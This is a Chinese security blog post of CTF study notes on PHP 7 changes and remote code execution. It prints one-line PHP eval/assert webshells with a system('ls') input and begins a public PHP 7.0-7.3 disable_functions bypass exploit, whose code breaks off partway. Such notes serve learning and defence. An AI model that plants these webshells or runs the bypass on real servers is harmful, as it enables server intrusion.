<!DOCTYPE html>
<html lang="en">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="m0nk3y">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="m0nk3y">
    
    <meta name="keywords" content="信息安全,CTF,攻防对抗,代码审计,安全研究,渗透测试">
    
    <meta name="description" content="">
    <meta name="description" content="前言一直觉得自己对相关的漏洞学的马马虎虎，没有深入总结，最近几次CTF比赛中也吃了不少的亏。遂想花一两天的时间来好好总结一下各个版本之间的区别，漏洞利用方式的不同，于是有了这篇文章。 PHPPHP 现在应该一般都升级为php7了吧，所以来学习一波php7的新特性。 主要是参考这篇文章：http:&#x2F;&#x2F;www.php7.site&#x2F;book&#x2F;php7&#x2F;variable-changes-22.html#0">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP以及MYSQL相关版本差异及对应的安全问">
<meta property="og:url" content="https://hack-for.fun/d8714939.html">
<meta property="og:site_name" content="可惜没如果、m0nk3y‘s Blog">
<meta property="og:description" content="前言一直觉得自己对相关的漏洞学的马马虎虎，没有深入总结，最近几次CTF比赛中也吃了不少的亏。遂想花一两天的时间来好好总结一下各个版本之间的区别，漏洞利用方式的不同，于是有了这篇文章。 PHPPHP 现在应该一般都升级为php7了吧，所以来学习一波php7的新特性。 主要是参考这篇文章：http:&#x2F;&#x2F;www.php7.site&#x2F;book&#x2F;php7&#x2F;variable-changes-22.html#0">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200526231323.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200527134039.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200526231206.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200527135528.png">
<meta property="article:published_time" content="2020-08-25T15:53:12.000Z">
<meta property="article:modified_time" content="2020-08-26T01:49:08.867Z">
<meta property="article:author" content="m0nk3y">
<meta property="article:tag" content="PHP安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200526231323.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>PHP以及MYSQL相关版本差异及对应的安全问 · m0nk3y&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825203605.JPG" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="可惜没如果、m0nk3y‘s Blog" type="application/atom+xml">
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >M0nk3y&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">PHP以及MYSQL相关版本差异及对应的安全问</a>
            </div>
    </div>
    
    <a class="home-link" href=/>M0nk3y's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825211012.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            PHP以及MYSQL相关版本差异及对应的安全问
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "PHP安全">PHP安全</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">4.6k</span>Reading time: <span class="post-count reading-time">21 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/08/25</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>一直觉得自己对相关的漏洞学的马马虎虎，没有深入总结，最近几次CTF比赛中也吃了不少的亏。遂想花一两天的时间来好好总结一下各个版本之间的区别，漏洞利用方式的不同，于是有了这篇文章。</p>
<h1 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h1><p>PHP 现在应该一般都升级为<strong>php7</strong>了吧，所以来学习一波php7的新特性。</p>
<p>主要是参考这篇文章：<a target="_blank" rel="noopener" href="http://www.php7.site/book/php7/variable-changes-22.html#0">http://www.php7.site/book/php7/variable-changes-22.html#0</a></p>
<h2 id="变量处理机制"><a href="#变量处理机制" class="headerlink" title="变量处理机制"></a>变量处理机制</h2><ul>
<li>间接变量，属性和方法引用都按照 <strong>从作到右</strong>到顺序进行解释（如果想要改变顺序，可以使用大括号</li>
<li>global 关键字只能引用简单变量</li>
<li>无法将一个函数作为另一个函数的参数进行传递</li>
<li>引用赋值时自动创建数组元素或者对象属性顺序不同</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$array = [];</span><br><span class="line">$array[<span class="string">&quot;a&quot;</span>] =&amp; $array[<span class="string">&quot;b&quot;</span>];</span><br><span class="line">$array[<span class="string">&quot;b&quot;</span>] = <span class="number">1</span>;</span><br><span class="line">var_dump($array);</span><br><span class="line">PHP7产生的数组：[<span class="string">&quot;a&quot;</span> =&gt; <span class="number">1</span>, <span class="string">&quot;b&quot;</span> =&gt; <span class="number">1</span>]</span><br><span class="line">PHP5产生的数组：[<span class="string">&quot;b&quot;</span> =&gt; <span class="number">1</span>, <span class="string">&quot;a&quot;</span> =&gt; <span class="number">1</span>]</span><br></pre></td></tr></table></figure>

<h2 id="list"><a href="#list" class="headerlink" title="list()"></a>list()</h2><ul>
<li><code>list()</code> 按照顺序进行取值。</li>
<li>对一个空的list()赋值不再允许</li>
<li>list() 不再具有拆分功能</li>
</ul>
<h2 id="foreach"><a href="#foreach" class="headerlink" title="foreach()"></a>foreach()</h2><ul>
<li>foreach循环对数组内部指针不再起作用</li>
<li>foreach进行by-value循环时，是对该数组的拷贝操作，如果对其进行修改也没有影响</li>
<li>按照引用进行循环时，对数组进行修改就会有影响</li>
</ul>
<h2 id="参数处理机制"><a href="#参数处理机制" class="headerlink" title="参数处理机制"></a>参数处理机制</h2><ul>
<li>不再支持重复参数名（也没人这样用</li>
<li>Func_get_arg 和 func_get_args，这两个方法返回参数当前的值，而不是传入时的值</li>
<li>PHP7 报错的时候，也是报当前值</li>
</ul>
<h2 id="整数处理机制修改"><a href="#整数处理机制修改" class="headerlink" title="整数处理机制修改"></a>整数处理机制修改</h2><ul>
<li>无效的8进制数会编译报错，而老版本会忽略无效的数字</li>
<li>位移负的位置会产生异常 ArithmeticError: Bit shift by negative number</li>
<li>左位移如果超出位数返回 <code>0</code></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(<span class="number">1</span> &lt;&lt; <span class="number">64</span>);</span><br></pre></td></tr></table></figure>

<ul>
<li>右移如果超出位数返沪0或-1</li>
</ul>
<h2 id="字符串处理机制修改"><a href="#字符串处理机制修改" class="headerlink" title="字符串处理机制修改"></a>字符串处理机制修改</h2><ul>
<li>含有16进制的字符串不再视为数字，也不区别对待。这个就会涉及到一些绕过了。</li>
<li><code>\u&#123;</code> 后面如果包含非法字符会报错</li>
</ul>
<h2 id="其他修改"><a href="#其他修改" class="headerlink" title="其他修改"></a>其他修改</h2><ul>
<li>CURL模块：禁止禁用CURLOPT_SAFE_UPLOAD选项，通过curl上传文件必须使用curl_file/CURLFILE接口。</li>
<li>DATE模块：mktime()和gmmktime()函数移除了$is_dst parameter参数。</li>
<li>DBA模块：dba_delete() 如果在inifile里面没有找到key的时候会返回false。</li>
<li>GMP模块：必须用libgmp 4.2版本以上。gmp_setbit() and gmp_clrbit()如果传入的index为负数的话，会返回false。</li>
<li>Intl模块：移除了别名函数datefmt_set_timezone_id() 和IntlDateFormatter::setTimeZoneID()，用datefmt_set_timezone() 和IntlDateFormatter::setTimeZone()</li>
<li><strong>libxml模块：新增ibxml 2.9.0引入的LIBXML_BIGLINES 选项，并在错误报告中增加了行号&gt; 16-bit的支持。</strong></li>
<li>Mcrypt模块：.移除了mcrypt_generic_end() mcrypt_ecb(), mcrypt_cbc(), mcrypt_cfb() 和mcrypt_ofb()</li>
<li>Opcache：移除了opcache.load_comments配置项，现在注释加载总是被激活的。</li>
<li>OpenSSL：移除了”rsa_key_size”、”CN_match” 、”SNI_server_name” 选项。</li>
<li><strong>PCRE：移除了 /e (PREG_REPLACE_EVAL) 修饰符的支持，使用preg_replace_callback()来代替。</strong></li>
<li>PDO_pgsql：删除了PGSQL_ATTR_DISABLE_NATIVE_PREPARED_STATEMENT选项。</li>
<li>Standard：删除了setlocale()函数里面对字符串类型的支持，使用LC_*常量。删除了set_magic_quotes_runtime() magic_quotes_runtime().</li>
<li>JSON：json_decode()会拒绝与RFC 7159不兼容的数字格式。json_decode第一个参数是空值的时候会返回json语法错误。</li>
<li>Stream：删除别名函数set_socket_blocking()</li>
<li>XSL：删除xsl.security_prefs 选项。</li>
<li>session<ul>
<li>session_start()可以接受所有的INI设置，可以用数组的方式传入，比如：[‘cache_limiter’=&gt;’private’]</li>
<li>save handler接受validate_sid(), update_timestamp() ，可用来检查sid是否存在，更新session数据的时间戳。</li>
<li>增加了SessionUpdateTimestampHandlerInterface，这个接口里面定义了validateSid(), updateTimestamp()方法。</li>
<li>session.lazy_write(default=On) 配置项可以允许只有session数据有变化时才写数据。</li>
</ul>
</li>
</ul>
<p>。。。。。。</p>
<p>以及其他特性。</p>
<h1 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h1><p><a target="_blank" rel="noopener" href="https://www.cc1021.com/article/134.html">https://www.cc1021.com/article/134.html</a></p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><h2 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h2><h3 id="eval"><a href="#eval" class="headerlink" title="eval"></a>eval</h3><p>Eval 把其中的字符串当做PHP代码进行执行。所有语句必须以分号结束。</p>
<blockquote>
<p>函数*<em>eval()**语言结构是 <em>非常危险\</em>的， 因为它允许执行任意 PHP 代码。 \</em>它这样用是很危险的。* 如果您仔细的确认过，除了使用此结构以外 别无方法, 请多加注意，<em>不要允许传入任何由用户 提供的、未经完整验证过的数据</em> 。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="keyword">eval</span>($_POST[<span class="number">1</span>]);</span><br><span class="line"><span class="comment">// 或者</span></span><br><span class="line">    $code = $_GET[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">eval</span>($code);</span><br><span class="line"><span class="comment">// 或者</span></span><br><span class="line">    $_POST[<span class="number">1</span>]($_POST[<span class="number">2</span>]);</span><br><span class="line"><span class="comment">// 传入：1=assert&amp;2=system(&#x27;ls&#x27;)</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> </span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?=</span></span><br><span class="line">  <span class="comment">// short_open_tag=On</span></span><br></pre></td></tr></table></figure>

<p>eval 是一个语言构造器，而不是一个函数。不能被可变 函数调用。</p>
<h3 id="assert"><a href="#assert" class="headerlink" title="assert"></a>assert</h3><p>检查一个断言是否为FALSE。</p>
<p>PHP 5:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert ( mixed $assertion [, <span class="keyword">string</span> $description ] ) : <span class="keyword">bool</span></span><br></pre></td></tr></table></figure>

<p>PHP 7:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert ( mixed $assertion [, <span class="built_in">Throwable</span> $exception ] ) : <span class="keyword">bool</span></span><br></pre></td></tr></table></figure>

<p>如果<code>assertion</code> 为字符串，那么会被当做php 代码来执行。<strong>在PHP 7 中，变为语言结构而不是函数，即不能像eval那样支持可变函数了。</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$_POST[<span class="number">1</span>]($_POST[<span class="number">2</span>]); <span class="comment">// 在php7 中无法使用1=assert&amp;2=system(&#x27;ls&#x27;);</span></span><br></pre></td></tr></table></figure>

<p>eval其实是Zend引擎到函数，而assert是PHP_FUNCTION 宏编写的，调用不同。</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html">https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/173201">https://www.anquanke.com/post/id/173201</a></p>
<h3 id="disable-function"><a href="#disable-function" class="headerlink" title="disable_function"></a>disable_function</h3><h4 id="Php-7-0-7-3-bypass"><a href="#Php-7-0-7-3-bypass" class="headerlink" title="Php 7.0-7.3 bypass"></a>Php 7.0-7.3 bypass</h4><p>:<a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass">https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># PHP 7.0-7.3 disable_functions bypass PoC (*nix only)</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># <span class="doctag">Bug:</span> https://bugs.php.net/bug.php?id=72530</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># This exploit should work on all PHP 7.0-7.3 versions</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Author: https://github.com/mm0r1</span></span><br><span class="line"></span><br><span class="line">pwn(<span class="string">&quot;uname -a&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">pwn</span>(<span class="params">$cmd</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $abc, $helper;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">str2ptr</span>(<span class="params">&amp;$str, $p = <span class="number">0</span>, $s = <span class="number">8</span></span>) </span>&#123;</span><br><span class="line">        $address = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">for</span>($j = $s<span class="number">-1</span>; $j &gt;= <span class="number">0</span>; $j--) &#123;</span><br><span class="line">            $address &lt;&lt;= <span class="number">8</span>;</span><br><span class="line">            $address |= ord($str[$p+$j]);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $address;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">ptr2str</span>(<span class="params">$ptr, $m = <span class="number">8</span></span>) </span>&#123;</span><br><span class="line">        $out = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; $m; $i++) &#123;</span><br><span class="line">            $out .= chr($ptr &amp; <span class="number">0xff</span>);</span><br><span class="line">            $ptr &gt;&gt;= <span class="number">8</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $out;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">write</span>(<span class="params">&amp;$str, $p, $v, $n = <span class="number">8</span></span>) </span>&#123;</span><br><span class="line">        $i = <span class="number">0</span>;</span><br><span class="line">        <span 